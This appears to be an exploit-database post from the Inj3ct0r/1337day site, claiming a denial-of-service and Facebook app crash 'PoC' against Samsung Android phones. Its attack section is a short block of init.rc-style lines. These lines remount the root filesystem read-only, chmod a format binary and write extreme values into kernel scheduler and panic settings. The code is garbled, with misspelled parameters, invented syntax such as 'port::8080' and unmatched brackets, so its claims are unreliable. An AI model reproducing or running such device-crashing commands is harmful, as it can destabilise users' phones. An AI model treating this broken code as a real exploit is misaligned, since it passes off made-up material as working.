1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [x] Official Website: http://www.1337day.com 0 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 0 0 1 ========================================== 1 0 I'm Taurus Omar Member From Inj3ct0r TEAM 1 1 ========================================== 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 | | | Android Mobile 2.6.xxx Dos Vulnerability & Facebook App Crash Poc | -------------------------------------------------------------------------- +----------------| ABOUT ME |--------------------+ NAME: TAURUS OMAR - HOME: ACCESOILEGAL.BLOGSPOT.COM - TWITTER: @taurusomar_ - E-MAIL: omar-taurus[at]dragonsecurity[dot]org - E-MAIL: omar-taurus[at]live[dot]com - PWNED: #ZUUU - +------------------------------------------------+ # Exploit Title: Android Mobile 2.6.xxx Dos & Facebook App Crash Poc # Vendor Name: Samsung # Url Vendor: http://wwww.android.com/ # Category:: Doc/Pocs # Tested on: Samsung Galaxy sI/sII/sIII - Lg Optimus Al Version - Google Android Mobile # Type: Hardware - Android |---------> Dos Vulnerability => fat.fotmat <-----------| chmod 750 /sbin/fat.format mount rootfs rootfs / ro remount port::8080 write /proc/sys/kernel/panic_on_oops 100 write /proc/sys/kernel/hung_task_timeout_secs 1000 write /proc/cpu/alignment 40000 write /proc/sys/kernel/sched_latency_ns 400000000 write /proc/sys/kernel/sched_wakeup_granularity_ns 800000000 write /proc/sys/kernel/sched_child_runs_firts 10 on boot::run <hostname><localhost> <domainname><localdomain> |---------> Facebook App Crash Poc => init.rc <-----------| +-------------------------------+ Proof of CONCEPT IMAGES http://i.imgur.com/dKG4f.jpg +-------------------------------+ @hooks [ } func stop files[ "/system/app/facebook.odex "~/.facebook.odex" ] errors false } ]